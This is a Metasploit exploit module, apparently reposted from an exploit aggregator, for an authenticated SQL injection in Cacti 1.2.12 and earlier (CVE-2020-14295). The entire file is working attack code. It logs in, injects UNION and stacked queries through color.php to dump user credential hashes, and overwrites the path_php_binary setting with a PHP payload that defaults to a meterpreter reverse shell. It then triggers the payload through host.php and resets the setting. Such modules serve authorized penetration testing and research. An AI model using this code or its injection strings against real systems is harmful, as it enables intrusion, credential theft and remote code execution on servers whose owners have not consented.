Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT/UNIX/HTTP/CACTI_FILTER_SQLI_RCE/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/hashes/identify'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cacti color filter authenticated SQLi to RCE',
        'Description' => %q{
          This module exploits a SQL injection vulnerability in Cacti 1.2.12 and before. An admin can exploit the filter
          variable within color.php to pull arbitrary values as well as conduct stacked queries. With stacked queries, the
          path_php_binary value is changed within the settings table to a payload, and an update is called to execute the payload.
          After calling the payload, the value is reset.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'h00die', # msf module
            'Leonardo Paiva', # edb, RCE
            'Mayfly277' # original github, M4yFly on twitter SQLi
          ],
        'References' =>
          [
            [ 'EDB', '49810' ],
            [ 'URL', 'https://github.com/Cacti/cacti/issues/3622' ],
            [ 'CVE', '2020-14295' ]
          ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'DefaultOptions' => { 'Payload' => 'php/meterpreter/reverse_tcp' },
        'Payload' =>
          {
            'BadChars' => "\x22\x27" # " '
          },
        'Notes' =>
          {
            'Stability' => [ CRASH_SAFE ],
            'Side Effects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          },
        'Targets' =>
          [
            [ 'Automatic Target', {}]
          ],
        'DisclosureDate' => '2020-06-17',
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
        OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
        OptString.new('TARGETURI', [ true, 'The URI of Cacti', '/cacti/']),
        OptBool.new('CREDS', [ false, 'Dump cacti creds', true])
      ]
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'method' => 'GET'
      )
      return CheckCode::Safe("#{peer} - Could not connect to web service - no response") if res.nil?
      return CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

      # cacti gives us the version in a JS variable
      /var cactiVersion='(?<version>\d{1,2}\.\d{1,2}\.\d{1,2})'/ =~ res.body

      if version && Rex::Version.new(version) <= Rex::Version.new('1.2.12')
        vprint_good("Version Detected: #{version}")
        return CheckCode::Appears
      end
    rescue ::Rex::ConnectionError
      CheckCode::Safe("#{peer} - Could not connect to the web service") # unknown maybe?
    end
    CheckCode::Safe("Cacti #{version} is not a vulnerable version.")
  end

  def exploit
    login

    # optionally grab the un/pass fields for all users.  While we're already admin, cred stuffing...
    if datastore['CREDS']
      # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
      print_status('Dumping creds')
      res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
      return unless res
      return if res.nil?
      return if res.body.nil?

      res.body.split.each do |cred|
        /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
        next unless hash
        next if hash == 'hex' # header row

        print_good("Username: #{username}, Password Hash: #{hash}")
        report_cred(
          username: username,
          password: hash,
          private_type: :nonreplayable_hash
        )
      end
    end

    print_status('Backing-up path_php_binary value')
    res = inject("')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")

    # return value:
    # "name","hex"
    # "","FEFCFF"
    # "/usr/bin/php","3"
    if res && !res.body.nil?
      php_binary = res.body.split.last # check to make sure we have something first before proceeding
      fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") if php_binary.nil?
      php_binary = php_binary.split(',')[0].gsub('"', '') # take last entry on page, and split to value
    end
    fail_with(Failure::NotFound, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
    print_good("path_php_binary: #{php_binary}")

    print_status('Uploading payload')
    begin
      pload = "#{php_binary} -r '#{payload.encoded}' #"
      pload = Rex::Text.uri_encode(pload.gsub("'", "\\\\'"))
      inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
      print_good('Executing Payload')
      trigger
    ensure
      resetsqli(php_binary)
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  def login
    cookie_jar.clear

    print_status('Grabbing CSRF')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'keep_cookies' => true
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
    fail_with(Failure::NotFound, 'Unable to find CSRF token') unless csrf

    print_good("CSRF: #{csrf}")

    print_status('Attempting login')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'keep_cookies' => true,
      'vars_post' => {
        'login_username' => datastore['USERNAME'],
        'login_password' => datastore['PASSWORD'],
        'action' => 'login',
        '__csrf_magic' => csrf
      }
    )

    if res && res.code != 302
      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
    end

    res
  end

  def inject(content)
    res = send_request_cgi(
      'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
      'keep_cookies' => true
    )

    if res && res.code != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})")
    end
    res
  end

  def trigger
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'host.php'),
      'keep_cookies' => true,
      'vars_get' => {
        'action' => 'reindex'
      }
    )
  end

  def resetsqli(php_binary)
    print_status('Cleaning up environment')
    login # any subsequent requests with our cookie will fail, so we'll need to login a 2nd time to reset the database value correctly
    print_status('Resetting DB Value')
    inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';")
  end

  def report_cred(opts)
    service_data = {
      address: datastore['RHOST'],
      port: datastore['RPORT'],
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:username],
      private_data: opts[:password],
      private_type: opts[:private_type],
      jtr_format: identify_hash(opts[:password])
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: ''
    }.merge(service_data)
    create_credential_login(login_data)
  end

end